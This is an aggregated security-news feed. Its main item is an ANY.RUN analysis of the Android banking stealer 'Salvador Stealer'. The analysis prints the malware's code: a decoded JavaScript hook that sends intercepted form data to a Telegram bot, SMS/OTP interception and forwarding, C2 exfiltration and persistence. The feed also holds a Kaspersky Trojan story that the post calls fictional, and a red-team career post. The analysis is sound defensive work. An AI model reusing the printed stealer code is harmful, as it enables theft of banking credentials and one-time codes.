Check Point has responded to a hacker’s claims of sensitive data theft, confirming an incident but saying that it had limited impact.
The post Check Point Responds to Hacking Claims appeared first on SecurityWeek.
SecurityWeek – Read More
The cryptocurrency world feels like a wild ride full of risks, twists, and big dreams of building wealth.…
Hackread – Latest Cybersecurity, Tech, AI, Crypto & Hacking News – Read More
Want to avoid having your online accounts hacked? Two-factor authentication is a crucial security measure that requires an extra step for signing in to high-value services. Here’s how to set up 2FA and which accounts to focus on.
Latest stories for ZDNET in Security – Read More
In this report, we examine an Android malware sample recently collected and analyzed by our team. This malware masquerades as a banking application and is built to steal sensitive user information. During the analysis, we came across internal references to “Salvador,” so we decided to name it Salvador Stealer.
Real-time visibility into mobile malware behavior is crucial for security teams, SOC analysts, and mobile app providers. This analysis demonstrates how advanced threats can bypass user trust and steal sensitive data, highlighting the need for dynamic malware analysis solutions.
The collected malware sample is a dropper that delivers a banking stealer masquerading as a legitimate banking app. Its primary goal is to collect sensitive user information, including:
It embeds a phishing website inside the Android application to trick users into entering their credentials. Once submitted, the stolen data is immediately sent to both the phishing site and a C2 server controlled via Telegram.
In this technical breakdown, we’ll walk you through how this malware operates, how it maintains persistence, and how it exfiltrates sensitive data in real time.
To uncover the full behavior of Salvador Stealer and observe its actions in real time, we executed the sample inside ANY.RUN’s new Android sandbox.
View the full analysis session
This interactive environment allowed us to quickly analyze the malware’s behavior, visualize its activity, and identify key indicators, all while saving significant analysis time.
The malware consists of two key components:
The dropper APK is designed to silently install and execute the malicious payload. To enable this, it declares specific permissions and intent filters in its AndroidManifest.xml, including:
<uses-permission android:name="android.permission.REQUEST_INSTALL_PACKAGES"/>
And
<intent-filter>
<action android:name="com.example.android.apis.content.SESSION_API_PACKAGE_INSTALLED" android:exported="true"/>
</intent-filter> This behavior was clearly observed in our sandbox environment, where the malware launched a new activity immediately after execution.
If we open the initial dropper APK using WinRAR, we can see base.apk, which serves as the actual malicious payload. The dropper APK is responsible for dropping and launching this payload without the victim’s knowledge.
Once executed, base.apk exhibits several key behaviors:
The Salvador Stealer tricks users into entering their banking credentials through a fake banking interface phishing page embedded in the app.
Once the user submits their credentials, the data is immediately sent to both the C2 server and a Telegram bot.
On the first page, the app prompts the user to enter:
Once this information is submitted, it is immediately sent to:
On the next stage, the app asks the user to provide:
This data is also exfiltrated to both the phishing server and the Telegram bot. We can see this easily inside ANY.RUN Android sandbox:
These credential theft attempts were clearly captured in the HTTP request logs during sandbox analysis.
By enabling HTTPS MITM Proxy mode in ANY.RUN’s Android sandbox, we were able to intercept and verify the exfiltration of user data in real time.
The base.apk file embedded in the dropper APK contains the core malicious functionality of Salvador Stealer. Here’s a detailed look at its structure
Encrypted Strings & Obfuscation
We’ll begin by opening one of the Java files to analyze its contents. Let’s start with Earnestine.java.
public class Earnestine extends BroadcastReceiver {
private static final Map<String, StringBuilder> sdghedy = new ConcurrentHashMap();
@Override // android.content.BroadcastReceiver
public void onReceive(Context context, Intent intent) {
Object[] pdus;
if (intent.getAction().equals(NPStringFog.decode("0F1E09130108034B021C1F1B080A04154B260B1C0811060E091C5C3D3D3E3E3C2424203B383529")) && (pdus = (Object[]) intent.getExtras().get(NPStringFog.decode("1E141812"))) != null) {
for (Object pdu : pdus) {
... We can see that the strings are encrypted using a custom method. The decryption is performed using NPStringFog.decode(…), defined in the NPStringFog.java class.
Let’s examine that next to understand what type of encryption is used.
Opening NPStringFog.java, we can confirm that it implements XOR decryption using a static key: “npmanager”.
package obfuse;
import java.io.ByteArrayOutputStream;
public class NPStringFog {
public static String KEY = "npmanager"; // XOR key
private static final String hexString = "0123456789ABCDEF"; // Hexadecimal string for conversion
public static String decode(String str) {
ByteArrayOutputStream baos = new ByteArrayOutputStream(str.length() / 2);
// Convert hex string to byte array
for (int i = 0; i < str.length(); i += 2) {
baos.write((hexString.indexOf(str.charAt(i)) << 4) | hexString.indexOf(str.charAt(i + 1)));
}
byte[] b = baos.toByteArray();
int len = b.length;
int keyLen = KEY.length();
// XOR decryption
for (int i2 = 0; i2 < len; i2++) {
b[i2] = (byte) (b[i2] ^ KEY.charAt(i2 % keyLen)); // XOR byte with key
}
return new String(b);
}
} This confirms that the encryption is XOR-based. Using CyberChef, we can manually decode strings like the one found in Earnestine:
Cyberchef rule:
https%3A%2F%2Fgchq.github.io%2FCyberChef%2F%23recipe%3DFrom_Hex%28%27Auto%27%29XOR%28%257B%27option%27%3A%27Latin1%27%2C%27string%27%3A%27npmanager%27%257D%2C%27Standard%27%2Cfalse%29%26input%3DMEYxRTA5MTMwMTA4MDM0QjAyMUMxRjFCMDgwQTA0MTU0QjI2MEIxQzA4MTEwNjBFMDkxQzVDM0QzRDNFM0UzQzI0MjQyMDNCMzgzNTI5To analyze the rest of the APK effectively, we’ll need to decode all encrypted strings automatically. Here’s a Python script that recursively scans all .java files, decrypts any encrypted strings using the same XOR method, and writes the result to a _decoded.java file.
import re
import os
def decode_npstringfog(encoded: str, key: str = "npmanager") -> str:
b = bytearray()
for i in range(0, len(encoded), 2):
b.append(int(encoded[i:i+2], 16))
key_bytes = key.encode()
return bytearray((b[i] ^ key_bytes[i % len(key_bytes)]) for i in range(len(b))).decode(errors="replace")
def decode_and_save(filepath: str):
with open(filepath, "r", encoding="utf-8") as f:
content = f.read()
# Find all NPStringFog.decode("...")
pattern = re.compile(r'NPStringFog.decode("([0-9A-F]+)")')
if not pattern.search(content):
return
decoded_content = pattern.sub(lambda m: f'"{decode_npstringfog(m.group(1))}"', content)
outpath = filepath.replace(".java", "_decoded.java")
with open(outpath, "w", encoding="utf-8") as f:
f.write(decoded_content)
print(f"[+] Decoded file written: {outpath}")
def walk_and_decode(base_dir: str = "."):
for root, _, files in os.walk(base_dir):
for file in files:
if file.endswith(".java"):
full_path = os.path.join(root, file)
decode_and_save(full_path)
walk_and_decode() Now that we’ve decoded the files, we can begin our deeper analysis of base.apk.
Let’s start with Helene.java, which acts as the main activity of the application. It loads a webpage and handles runtime permissions.
Upon launch, it checks for the necessary Android permissions and ensures there is an active internet connection.
@Override
public void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_ffff);
changeStatusBarColor("#4CAF50");
...
if (checkPermissions(this)) {
WebView webView = (WebView) findViewById(R.id.randomWebView);
setupWebView(this, webView);
initiateForegroundServiceIfRequired();
} else {
requestAppPermissions();
}
}
This method sets up the UI, verifies permissions, and initializes a WebView. The setupWebView() method enables JavaScript and DOM storage, then loads the phishing page:
public void setupWebView(Context context, final WebView webView) {
WebSettings settings = webView.getSettings();
settings.setJavaScriptEnabled(true);
settings.setDomStorageEnabled(true);
...
webView.loadUrl("https://t15.muletipushpa.cloud/page/");
} Once the page finishes loading, a malicious JavaScript payload is injected:
String jsCode = "eval(decodeURIComponent('%28%66%75%6e%63%74%69.....'));"; After decoding, the JavaScript reveals that it hooks into XMLHttpRequest.prototype.send, which is commonly used by web apps to send data (e.g., login credentials or session info).
(function() {
const originalSend = XMLHttpRequest.prototype.send;
XMLHttpRequest.prototype.send = function(data) {
try {
const botToken = "7931012454:AAGdsBp3w5fSE9PxdrwNUopr3SU86mFQieE";
const chatId = "-1002480016557";
const telegramUrl = `https://api.telegram.org/bot${botToken}/sendMessage`;
const telegramMessage = {
chat_id: chatId,
text: `Intercepted Data Sent:n${data}`
};
fetch(telegramUrl, {
method: 'POST',
headers: {
'Content-Type': 'application/json'
},
body: JSON.stringify(telegramMessage)
});
} catch (e) {
console.error("Error sending to Telegram:", e);
}
return originalSend.apply(this, arguments);
};
})();It intercepts all AJAX/XHR requests made from the loaded phishing page. These intercepted payloads are sent to a hardcoded Telegram chat via the Bot API.
After loading the phishing WebView it requests several Android permissions, including:
These permissions are essential for the malware’s goals—intercepting one-time passwords (OTPs) and forwarding them.
Once the permissions are granted, the initiateForegroundServiceIfRequired() method is called, launching the Fitzgerald service.
This foreground service creates a fake notification (“Customer support”) and more importantly, it immediately registers a broadcast receiver to intercept incoming SMS:
this.smsReceiver = new Earnestine();
registerReceiver(this.smsReceiver, new IntentFilter("android.provider.Telephony.SMS_RECEIVED")); This is the real starting point of the OTP interception process. Every incoming message is captured and parsed by Earnestine. From the PDU, the malware extracts the message body, sender’s number, and timestamp:
SmsMessage sms = SmsMessage.createFromPdu((byte[]) pdu, "3gpp");
String messageBody = sms.getMessageBody();
String senderId = sms.getOriginatingAddress();
long timestamp = sms.getTimestampMillis();The message is then stored using a map that groups multipart SMS messages together. Once it decides the message is complete and ready for exfiltration, the malware uses two separate mechanisms to forward it to the attacker:
Inside a function named Bradford(), the malware contacts a remote server to retrieve a forwarding number.
String urlString = "https://t15.muletipushpa.cloud/json/number.php";
...
String phoneNumber = jsonObject.optString("number", "");
Earnestine.this.sendSMS(messageBody, phoneNumber); This number is set by the attacker and can be changed at any time. If the server responds with enabled: true, the message is forwarded to that number using the standard SmsManager.
smsManager.sendTextMessage(phoneNumber, null, messageBody, null, null); If the number is not available or the response is malformed, the malware will fall back to a previously saved one stored in SharedPreferences. It uses the key “Salvador” as the name of the preference file, and “forwardingNumber” as the key to retrieve the last known destination.
This use of “Salvador” as a unique identifier for internal storage is what led us to name this malware Salvador Stealer:
SharedPreferences sharedPreferences = context.getSharedPreferences("Salvador", 0);
String savedPhoneNumber = sharedPreferences.getString("forwardingNumber", ""); This suggests the malware is designed to persist attacker-supplied configuration data between sessions, allowing it to continue exfiltrating OTPs even when the server is unreachable or temporarily offline.
Through another method called Randall(), the malware constructs a JSON payload containing the sender ID, message content, and timestamp:
jsonData.put("sender_id", senderId);
jsonData.put("message", messageBody);
jsonData.put("timestamp", timestamp); This data is then sent in a POST request to another hardcoded endpoint:
String apiUrl = "https://t15.muletipushpa.cloud/post.php";By using both SMS and HTTP as parallel delivery channels, the malware increases its chances of reliably delivering OTPs or any sensitive codes it intercepts, ensuring the attacker receives them regardless of connectivity issues or SMS blocking.
Even if the user or system tries to terminate the app’s background service, the malware is programmed to automatically restart it. When the Fitzgerald service is killed or swiped away, it immediately schedules a recovery task using Android’s WorkManager:
WorkRequest serviceRestartWork = new OneTimeWorkRequest.Builder(Mauricio.class)
.setInitialDelay(1L, TimeUnit.SECONDS)
.build();
WorkManager.getInstance(getApplicationContext()).enqueue(serviceRestartWork); The scheduled worker points to the Mauricio class. Inside, it simply relaunches Fitzgerald:
Intent Pasquale = new Intent(getApplicationContext(), Fitzgerald.class);
getApplicationContext().startForegroundService(Pasquale); This way, even if the user tries to shut the app down from the task manager or system settings, the malware silently revives itself within seconds.
If the device itself is rebooted, the malware still survives. A separate class named Ellsworth is responsible for this behavior. It listens for the system-wide BOOT_COMPLETED broadcast and triggers the Fitzgerald service again:
public class Ellsworth extends BroadcastReceiver {
@Override
public void onReceive(Context context, Intent intent) {
if (intent.getAction().equals("android.intent.action.BOOT_COMPLETED")) {
Intent serviceIntent = new Intent(context, (Class<?>) Fitzgerald.class);
context.startService(serviceIntent);
}
}
} This guarantees that the malware regains control after reboot and resumes intercepting SMS messages immediately.
During our analysis, we identified that the fake banking interface used by Salvador Stealer is actually a phishing websiteembedded inside the Android application.
The phishing page can be accessed directly at: 
hxxxs://t15[.]muletipushpa[.]cloud/page/start[.]php
We also detected another phishing page hosted on a different subdomain, following a pattern with incremental digits—from t01.* up to t15.*
At the time of writing, the attacker has also left the admin panel accessible to anyone.
The admin login page is publicly available at: hxxxs://t15[.]muletipushpa[.]cloud/admin/login[.]php
Brute-forcing the admin login panel reveals a message prompting the user to contact a WhatsApp number, likely belonging to the developer of this phishing malware.
hxxxs://api[.]whatsapp[.]com/send/?phone=916306285085&text&type=phone_number&app_absent=0Exposed phone number: +916306285085
This suggests that the attacker is either based in India or using an Indian phone number as a disguise.
The Salvador Stealer campaign poses a serious risk to both individuals and organizations:
The analysis of Salvador Stealer reveals how modern Android malware combines phishing, credential theft, and advanced persistence techniques to compromise sensitive financial data. Threats like this highlight the increasing complexity of mobile malware and the growing challenge of detecting and stopping them before damage is done.
By analyzing Salvador Stealer in real time using ANY.RUN’s Android sandbox, we were able to fully map its behavior, uncover its infrastructure, and extract key indicators in just minutes—something that would otherwise require hours of manual static analysis.
Here’s how analysis like this can bring value:
Effective defense starts with better visibility. Tools like ANY.RUN’s sandbox make real-time threat analysis actionable and accessible to everyone.
Try ANY.RUN’s Android Sandbox now
Phishing URL:
C2 Server (Telegram Bot):
File Hashes:
SHA256: 21504D3F2F3C8D8D231575CA25B4E7E0871AD36CA6BBB825BF7F12BFC3B00F5A
Threat actor’s phone number:
ANY.RUN helps more than 500,000 cybersecurity professionals worldwide. Our interactive sandbox simplifies malware analysis of threats that target both Windows and Linux systems. Our threat intelligence products, TI Lookup, YARA Search, and Feeds, help you find IOCs or files to learn more about the threats and respond to incidents faster.
The post Salvador Stealer: New Android Malware That Phishes Banking Details & OTPs appeared first on ANY.RUN’s Cybersecurity Blog.
ANY.RUN’s Cybersecurity Blog – Read More
Phishing scams are getting brutally effective, and even technically sophisticated people can get fooled. Here’s how to limit the damage right away, and what to do next.
Latest stories for ZDNET in Security – Read More
One missed update turned my website into a hacker’s playground and another locked me out of my own business tools. Here’s why skipping software updates isn’t worth the risk.
Latest stories for ZDNET in Security – Read More
France’s antitrust watchdog fined Apple 150 million euros ($162 million) over a privacy feature protecting users from apps snooping on them.
The post France’s Antitrust Watchdog Fines Apple for Problems With App Tracking Transparency appeared first on SecurityWeek.
SecurityWeek – Read More
What happens when you get fooled by an online scam that lands in your email or text messages? I’ll show you. Caution: Don’t try this at home.
Latest stories for ZDNET in Security – Read More
Imagine what the world would be like if tarot cards could accurately predict any and every event. Perhaps we could have nipped Operation Triangulation in the bud, and zero-day vulnerabilities wouldn’t exist at all, as software developers would receive alerts in advance thanks to tarot readings.
Sounds incredible? Well, our experts actually looked into similar methods in their latest discovery! Read on to learn about the new Trojan we found and how we did it.
The new Trojan — Trojan.Arcanum — is distributed through websites dedicated to fortune-telling and esoteric practices, disguised as a “magic” app for predicting the future. At first glance, it looks like a harmless program offering users the chance to lay out virtual tarot cards, calculate astrological compatibility, or even “charge an amulet with the energy of the universe” (whatever that means). But in reality, something truly mystical is unfolding behind the scenes — in the worst possible way.
Once installed on the user’s device, Trojan.Arcanum connects to a cloud C2 server and deploys its payload — the Autolycus.Hermes stealer, the Karma.Miner miner, and the Lysander.Scytale crypto-malware. Having collected user data (logins; passwords; time, date and place of birth; banking information; etc.), the stealer sends it to the cloud. Then the real drama begins: the Trojan starts manipulating its victim in real life using social engineering!
Through pop-up notifications, Trojan.Arcanum sends pseudo-esoteric advice to the user, prompting them to take certain actions. For example, if the Trojan gains access to the victim’s banking apps and discovers significant funds in the account, the attackers send a command to give the victim a false prediction about the favorability of large investments. After this, the victim might receive a phishing email offering to participate in a “promising startup”. Or maybe they won’t — depending on how the cards fall.
In the meantime, the embedded Karma.Miner begins mining KARMA tokens, and the Trojan activates a paid subscription to dubious “esoteric practices” with monthly charges. If the user detects and terminates the KARMA mining, the crypto-malware randomly shuffles segments of the user’s files without any chance of recovery.
Typically, we hunt for cyberthreats using complex algorithms and data analysis. But what if the threat is too enigmatic? In such cases, trusting a tarot reading is the best approach. That’s exactly what our experts did. When performing divination on the signature of an unknown virus detected through KSN (Kaspersky Sacral Network), several Major Arcana cards appeared — some of them reversed:
How the reading looked on the expert’s table
Protecting yourself from such a virus is nearly impossible — if only because it doesn’t exist. This whole story is a fabrication from start to finish. But what’s stopping it from becoming a reality at any given moment? Trojans and other types of malware do often disguise themselves as legitimate apps and can steal all sorts of data. Miners have long been distributed through links under popular YouTube videos or video games. Ransomware is capable of paralyzing an entire nation’s healthcare insurance system. Moreover, magic themes are certainly popular enough to become a potential target of cybercriminals. Here are some tips to make your digital life safer:
Kaspersky official blog – Read More
Red Team Operator. A hype-tagged role tag for which one question hits our corporate LinkedIn inbox very often.
“Hey there, how can I become a Red Team Operator? Yours sincerely, a recent graduate.”
To us, this is like asking how to become a regular starter on a Premier League football team. There’s nothing wrong with aiming high. To live the dream, you need the passion and motivation to go all in – to put everything into reaching the apex. But beware: the chances of competing among the very best are slim.
Nonetheless, it’s worth spotlighting the Red Team roles and the journey that could one day land you in the big leagues. This means sneaking past Gartner Magic Quadrant leaders in endpoint protection and playing cat-and-mouse with well-staffed cyber fusion centers. Month after month.
Becoming a Red Teamer is a journey into the world of offensive security. The goal isn’t just to identify vulnerabilities or break things. It’s to help organizations improve detection and response, spot malicious actors early, and execute cyber incident management professionally.
Red Teamers are professionals hired to think like attackers. They simulate real-world (i.e., threat-led) cyberattacks to improve organizational resilience. It’s not just about technical skills. Creativity, adaptability, and perseverance are equally vital.
If you’re curious, creative, a critical thinker, a problem-solver, and also a project manager, business-savvy technologist, and team player then this might be the job for you.
Bad guys follow a mission to accomplish. So do Red Teamers.
Their goal might be to steal intellectual property, maintain persistence to monitor ongoing R&D, grab a soon-to-be-published quarterly report, initiate wire transfers, trigger SWIFT transactions, or extort a ransom by holding data hostage.
Before sending a single network packet, Red Teams plan extensively. They must answer questions like:
It becomes clear: this is never a one- or two-person show. Red Team exercises require a well-rounded team with diverse skills and a strategic, well-thought-out plan.
The procedure of infiltrating an enterprise is broadly structured. This process is often referred to as the Cyber Kill Chain. A term coined and trademarked by Lockheed Martin. The cybersecurity community commonly talks about TTPs. Tactics, Techniques, and Procedures.
Organizations in the cyber incident response space do contribute such TTP information to the MITRE ATT&CK framework, a public repository of adversarial behaviours and threat intelligence maintained under the umbrella of the MITRE Corporation.
Red Teams often rely on such intelligence to mimic real-world attackers or draw inspiration for mission goals. Following these sources ensures that Red Team exercises remain threat-led and realistic.
Of course, a Red Teamer knows prevalent TTPs inside out. They understand malware capabilities and adversary tools. Working through the kill chain may involve identification of vulnerabilities and exploitation of such. Thus, a high level of “hacker” skill is absolutely essential.
You might want to delve into our previous post: “How to Become a Hacker” for a kickstart on that topic. https://blog.compass-security.com/2024/05/how-to-become-a-hacker/
In any case, the Red Teamer’s mindset isn’t just about tech. It’s also about ethics and integrity. Haruki Murakami put it like “With great knowledge comes great responsibility.”
Technical skills are, of course, important. Many cybersecurity pros begin with a degree in computer science. As cyber becomes more mainstream, it’s getting harder for self-taught individuals to break in. We strongly advise confident self-learners not to underestimate the value companies place on skills beyond tech. A degree helps you develop abilities like:
Experience is crucial. The more you have, the better. You’ll need to understand how enterprises manage and defend IT, how they run networks and what software they use since you’ll encounter a huge variety of systems and environments.
Precision matters. Red Teamers must be quiet and deliberate, with strong OPSEC (operational security) awareness. The need exactly understand what’s needed to fly under the radar and which of their action could easily ring bells.
Certifications can help you deepen your knowledge, fill in gaps, and demonstrate you know the key concepts, tools and standard procedures.
Tools evolve. But critical thinking? Timeless. Tools won’t make you a Red Teamer any more than a stethoscope makes you a doctor. What matters is knowing why, when, and how to use them. Surgically.
Both red team operators and red team developers are essential members of a red team, but their roles focus on different aspects of offensive security. Let’s see the main differences.
A Red Team Operator is the hands-on executor of red team engagements, focused on simulating adversarial behaviour to test the company’s defences. The main responsibilities are:
The specific skillset required is the following:
The Red Team Developer is the creator and maintainer of custom tools, exploits, and frameworks used by red team operators during engagements. The main responsibilities are:
The specific skillset required is the following:
If this sounds exciting, you might just have what it takes to become a Red Team Operator. Cybersecurity needs defenders who can think like attackers. If you’re reading this far, maybe you’re one of them.
However, we’re sorry to say: There’s no shortcut.
No catapult.
No elevator.
Take the stairs.
Step by step.
Because each level teaches you something you’ll need on the floors above.
It may not sound exciting, but completing a degree and starting out as a penetration tester is often the best path. Eventually, you may acquire the skills needed to become a Red Teamer.
Sometime.
Happy hacking!
Q: So… Can I Apply as a Red Teamer Now?
Not quite. We don’t have open Red Team roles for entry-level candidates. We recommend starting your journey as a penetration tester. It’s the best way to build real-world experience and grow into the role.
Q: Do You Offer Mentorship?
Yes, but only for those who’ve already proven themselves as highly skilled pentesters. Red Teaming requires precision, trust, and deep technical and operational knowledge. We mentor selectively, based on demonstrated performance.
Q: I have strong skills but no degree. Is that enough?
We value passion and skills but also recognize that a degree is essential. It helps you develop the broad competencies needed in real-world engagements: critical thinking, communication, and strategic understanding.
If you’re serious about Red Teaming, pursuing a degree alongside your technical skills is a smart (and necessary) step.
Compass Security Blog – Read More